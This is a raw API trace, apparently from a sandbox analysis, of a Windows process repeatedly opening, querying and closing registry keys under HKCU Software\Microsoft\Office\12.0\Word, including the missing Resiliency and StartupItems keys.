[0085.293] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.293] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3cc) returned 0x0
[0085.293] RegCloseKey (hKey=0x3c8) returned 0x0
[0085.293] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.293] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3c8) returned 0x0
[0085.293] RegCloseKey (hKey=0x3cc) returned 0x0
[0085.293] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.293] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0085.293] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.293] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x0) returned 0x2
[0085.293] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.293] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3cc) returned 0x0
[0085.294] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.294] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d0) returned 0x0
[0085.294] RegCloseKey (hKey=0x3cc) returned 0x0
[0085.294] RegQueryInfoKeyW (in: hKey=0x3d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.294] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3cc) returned 0x0
[0085.294] RegCloseKey (hKey=0x3d0) returned 0x0
[0085.294] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.294] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d0) returned 0x0
[0085.294] RegCloseKey (hKey=0x3cc) returned 0x0
[0085.294] RegQueryInfoKeyW (in: hKey=0x3d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.294] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3cc) returned 0x0
[0085.294] RegCloseKey (hKey=0x3d0) returned 0x0
[0085.294] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.294] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0085.294] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.295] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d0) returned 0x0
[0085.295] RegQueryInfoKeyW (in: hKey=0x3d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.295] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.295] RegCloseKey (hKey=0x3d0) returned 0x0
[0085.295] RegQueryInfoKeyW (in: hKey=0x3d4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.295] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d0) returned 0x0
[0085.295] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.295] RegQueryInfoKeyW (in: hKey=0x3d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.295] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.295] RegCloseKey (hKey=0x3d0) returned 0x0
[0085.295] RegQueryInfoKeyW (in: hKey=0x3d4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.295] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d0) returned 0x0
[0085.296] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.296] RegQueryInfoKeyW (in: hKey=0x3d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0085.296] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d4) returned 0x0
[0085.296] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.296] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.296] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.296] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.296] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.296] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.297] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.297] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.298] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.299] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3d4) returned 0x0
[0085.299] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.299] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3d4) returned 0x0
[0085.299] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.299] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x3d4) returned 0x0
[0085.299] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.299] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x0) returned 0x2
[0085.299] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.299] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x3d4) returned 0x0
[0085.299] RegQueryInfoKeyW (in: hKey=0x3d4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.299] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x3d8) returned 0x0
[0085.299] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.299] RegQueryInfoKeyW (in: hKey=0x3d8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.300] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x3d4) returned 0x0
[0085.300] RegCloseKey (hKey=0x3d8) returned 0x0
[0085.300] RegQueryInfoKeyW (in: hKey=0x3d4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.300] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x3d8) returned 0x0
[0085.300] RegCloseKey (hKey=0x3d4) returned 0x0
[0085.300] RegQueryInfoKeyW (in: hKey=0x3d8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.300] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x3d4) returned 0x0
[0085.300] RegCloseKey (hKey=0x3d8) returned 0x0
[0085.300] RegQueryInfoKeyW (in: hKey=0x3d4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cb5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cb5c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cb58*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.300] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x0) returned 0x2
